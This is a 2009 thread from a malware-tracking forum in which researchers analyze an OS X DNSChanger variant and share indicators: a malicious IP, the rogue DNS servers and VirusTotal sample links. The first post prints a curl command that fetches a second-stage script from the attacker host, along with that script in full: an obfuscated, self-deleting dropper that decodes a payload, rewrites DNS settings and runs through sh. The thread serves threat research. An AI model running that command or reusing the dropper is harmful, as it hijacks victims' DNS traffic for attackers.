Malware Domain List

Malware Related => Malicious Domains => Zlkon.lv => Topic started by: MarcusB on April 18, 2009, 04:43:25 am

Title: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: MarcusB on April 18, 2009, 04:43:25 am
OSX version of DNSChanger contacts "94.247.2.109" with User-Agent "i386;0;7777;my_hostname;" to download another shell script at "/cgi-bin/generator.pl" which contains IPs to change the hosts DNS Server IPs to.

http://www.virustotal.com/analisis/00b8a659101f9a3446a6d88f1379ff31


Quote
curl -A 'i386;0;7777;my_hostname;' 94.247.2.109/cgi-bin/generator.pl
#!/bin/sh
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojk | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: Serg on April 20, 2009, 10:37:00 am
In script dns servers are
Code: [Select]
85.255.112.130
85.255.112.170
Could u provide a link (may be virustotall) to "install.pkg"?
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: SysAdMini on April 20, 2009, 10:41:18 am
In script dns servers are
Code: [Select]
85.255.112.130
85.255.112.170
Could u provide a link (may be virustotall) to "install.pkg"?

Are you looking for the OSX DNSChanger ?

http://www.malwaredomainlist.com/mdl.php?search=MAC+OSX%2FRSPlug-F&colsearch=All&quantity=50
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: MarcusB on April 20, 2009, 08:13:00 pm
.dmg file
http://www.virustotal.com/analisis/50d87c48d0299d43c012dba40ea346a5

install.pkg
http://www.virustotal.com/analisis/2133cd3427ac6b8a06f00b1512a00801

the malware that begins the process of infection
http://www.virustotal.com/analisis/e25bc9107152c6170dab471b16e191b5
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: Serg on April 20, 2009, 08:17:45 pm
Thank u!